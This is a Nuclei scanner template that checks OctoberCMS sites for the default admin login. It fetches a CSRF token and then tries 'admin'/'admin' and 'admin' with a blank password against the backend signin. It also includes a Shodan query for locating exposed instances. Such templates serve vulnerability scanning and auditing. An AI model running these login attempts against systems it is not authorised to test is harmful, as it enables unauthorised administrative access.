nuclei-templates/default-logins/octobercms-default-login.yaml

67 lines
1.5 KiB
YAML

id: octobercms-default-login
info:
name: OctoberCMS - Default Admin Discovery
author: princechaddha
severity: high
description: OctoberCMS default admin credentials were discovered.
reference:
- https://github.com/octobercms/october
- https://octobercms.com/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
verified: true
shodan-query: http.component:"October CMS"
tags: octobercms,default-login,oss
requests:
- raw:
- |
GET /backend/backend/auth/signin HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /backend/backend/auth/signin HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
_token={{token}}&postback=1&login={{username}}&password={{password}}
cookie-reuse: true
attack: clusterbomb
payloads:
username:
- admin
password:
- admin
- ""
matchers-condition: and
matchers:
- type: word
part: header
words:
- "october_session="
- "admin_auth="
condition: and
- type: status
status:
- 302
extractors:
- type: regex
part: body
name: token
internal: true
group: 1
regex:
- 'meta name="csrf\-token" content="([A-Za-z0-9]+)">'
# Enhanced by mp on 2022/07/15